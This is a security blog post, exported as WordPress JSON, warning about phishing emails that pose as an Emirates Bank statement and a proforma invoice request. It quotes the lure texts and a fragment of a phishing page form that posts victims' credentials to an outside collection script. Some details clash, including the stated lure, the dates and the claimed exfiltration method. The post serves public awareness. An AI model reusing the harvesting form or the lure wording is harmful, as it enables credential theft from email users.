{"id":12784,"date":"2022-07-12T16:14:59","date_gmt":"2022-07-12T16:14:59","guid":{"rendered":"https:\/\/myonlinesecurity.co.uk\/?p=12784"},"modified":"2023-04-01T06:34:02","modified_gmt":"2023-04-01T06:34:02","slug":"email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams","status":"publish","type":"page","link":"https:\/\/myonlinesecurity.co.uk\/email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams\/","title":{"rendered":"Email Credential Phishing Via Fake Emirates Bank Statement And Fake Generic Proforma Invoice Scams"},"content":{"rendered":"

We see lots of phishing attempts for email credentials. This morning we are seeing a series of \u201cattacks\u201d using Adobe as the lure. So far I have seen 2 different ones<\/p>\n

Remember many email clients, especially on a mobile phone or tablet, only show the Name in the From: and not the bit in <domain.com >. That is why these scams and phishes work so well.<\/p>\n

The First email looks like:<\/p>\n

From:<\/strong> Emirates Bank Online Statement <no-reply-googleaccountupdate@emailmessagingservices.com.pl><\/p>\n

Date:<\/strong> Wed 27\/09\/2021 00:30<\/p>\n

Subject:<\/strong> Cash Statement<\/p>\n

Attachment<\/strong>: Cash Statement.pdf<\/p>\n

Body Content:<\/strong><\/h3>\n

Dear Sir,<\/em><\/p>\n

Please kindly find attached bank statement debit notification and a copy of bank transferred receipt made in your favour today against your invoice.<\/em><\/p>\n

For your reference.<\/em><\/p>\n

Thank you.<\/em><\/p>\n

May M. Martinico<\/em><\/p>\n

Screenshot:<\/strong><\/h3>\n

\"\"<\/p>\n

This email has a genuine PDF attachment with a link to which will redirect you to . There is a warning on the bit.ly page that alerts to it being a phishing or malware site but will still allow you to visit the page by clicking the link.<\/p>\n

The phishing page refuses to display in Internet Explorer, Firefox or Chrome. ( just displaying a plain white page) . It uses data:text\/html;base64<\/p>\n

However downloading the html file will open in Firefox only on the computer.<\/p>\n

The page looks like this<\/p>\n

\"\"where if you enter any details and press submit, you are redirected to where you see this fake statement<\/p>\n

\"\"<\/p>\n

The next phishing scam works right out of the box with no effort<\/p>\n

From:<\/strong> Chychou Ann <chychou@sce.pccu.edu.tw><\/p>\n

Date:<\/strong> Wed 27\/09\/2017 02:36<\/p>\n

Subject<\/strong>: Request For Proforma Invoice Urgent<\/p>\n

Attachment<\/strong>: Ugent New Order.pdf<\/p>\n

Body Content:<\/strong><\/h3>\n

Hello!<\/em><\/p>\n

Nice to contact you again after a long time.<\/em>
\nDo you still remember me am?<\/em><\/p>\n

Find attach our Ugent purchase order.Are the prices<\/em>
\nstill the same like before? Pls confirm to us<\/em><\/p>\n

and send me proforma invoice with Bank account and payment terms.<\/em><\/p>\n

Best regard<\/em><\/p>\n

Chychou Ann<\/em><\/p>\n

\"\"<\/p>\n

This PDF attachment looks like<\/p>\n

Where if you follow the link you go to where you see<\/p>\n

\"\"<\/p>\n

Entering details tries to redirect you to , Where I get a 404 page not found ( a quick look up shows the site registered by Godaddy in 2001, The DNS is managed by Cloudflare and there is no site found, so it is highly likely that Cloudflare have null routed the DNS already)<\/p>\n

A quick look at the source code of the 000webhost page shows that it appears to try to send the information via Googlemail , but I am not sure how successful that will be<\/p>\n

<form method=\u201dPOST\u201d action=\u201dhttp:\/\/alliancecr.com\/skd\/xendr.php\u201d \/><\/em><\/p>\n

<div style=\u201dposition: absolute; width: 313px; height: 20px; z-index: 1; left: 476px; top: 240px\u201d id=\u201dlayer3\u2033><\/em><\/p>\n

<input type=\u201dhidden\u201d name=\u201dcontinue\u201d id=\u201dcontinue\u201d<\/em><\/p>\n

value=\u201dhttp:\/\/mail.google.com\/mail\/\u201d \/><\/em><\/p>\n

<input type=\u201dhidden\u201d name=\u201dservice\u201d id=\u201dservice\u201d<\/em><\/p>\n

value=\u201dmail\u201d \/><\/em><\/p>\n

<input type=\u201dhidden\u201d id=\u201d_utf8\u2033 name=\u201d_utf8\u2033 value=\u201d&#9731;\u201d\/><\/em><\/p>\n

<input type=\u201dhidden\u201d name=\u201dbgresponse\u201d id=\u201dbgresponse\u201d value=\u201djs_disabled\u201d><\/em><\/p>\n

<input type=\u201dhidden\u201d name=\u201dchallengestate\u201d id=\u201dchallengestate\u201d value=\u201dAO4Zohb47sJS-tYrNsz1ONocIO2jeysxuca-R6LmDH0cX6Sjqn8BGWloBrG1WmwW-4r7QsnjCVJZNloVJdjdxBh2Zmw4RaTFp8vb9O9bAnlffm-82_cInUo\u201d><\/em><\/p>\n

We all get very blas\u00e9 about phishing and think we know so much that we will never fall for a phishing attempt. Don\u2019t assume that all attempts are obvious. Watch for any site that invites you to enter ANY personal or financial information. It might be an email that says \u201cyou have won a prize\u201d or \u201csign up to this website for discounts, prizes and special offers\u201d<\/p>\n

Please read our How to protect yourselves page<\/a> for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.<\/p>\n

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying \u201clook at this picture of me I took last night\u201d and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details.<\/p>\n

Be very careful when unzipping them and make sure you have \u201cshow known file extensions enabled<\/a>\u201c, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened.<\/p>\n","protected":false},"excerpt":{"rendered":"

We see lots of phishing attempts for email credentials. This morning we are seeing a series of \u201cattacks\u201d using Adobe as the lure. So far I have seen 2 different ones Remember many email clients, especially on a mobile phone or tablet, only show the Name in the From: and not the bit in <domain.com…<\/p>\n","protected":false},"author":8,"featured_media":13404,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_kad_blocks_custom_css":"","_kad_blocks_head_custom_js":"","_kad_blocks_body_custom_js":"","_kad_blocks_footer_custom_js":"","_kad_post_transparent":"default","_kad_post_title":"default","_kad_post_layout":"default","_kad_post_sidebar_id":"","_kad_post_content_style":"default","_kad_post_vertical_padding":"default","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"taxonomy_info":[],"featured_image_src_large":["https:\/\/myonlinesecurity.co.uk\/wp-content\/uploads\/2022\/03\/email-phishing.jpg",1000,666,false],"author_info":{"display_name":"Darrel Heers","author_link":"https:\/\/myonlinesecurity.co.uk\/author\/darrel-heers\/"},"comment_info":0,"_links":{"self":[{"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/pages\/12784"}],"collection":[{"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/comments?post=12784"}],"version-history":[{"count":2,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/pages\/12784\/revisions"}],"predecessor-version":[{"id":28325,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/pages\/12784\/revisions\/28325"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/media\/13404"}],"wp:attachment":[{"href":"https:\/\/myonlinesecurity.co.uk\/wp-json\/wp\/v2\/media?parent=12784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}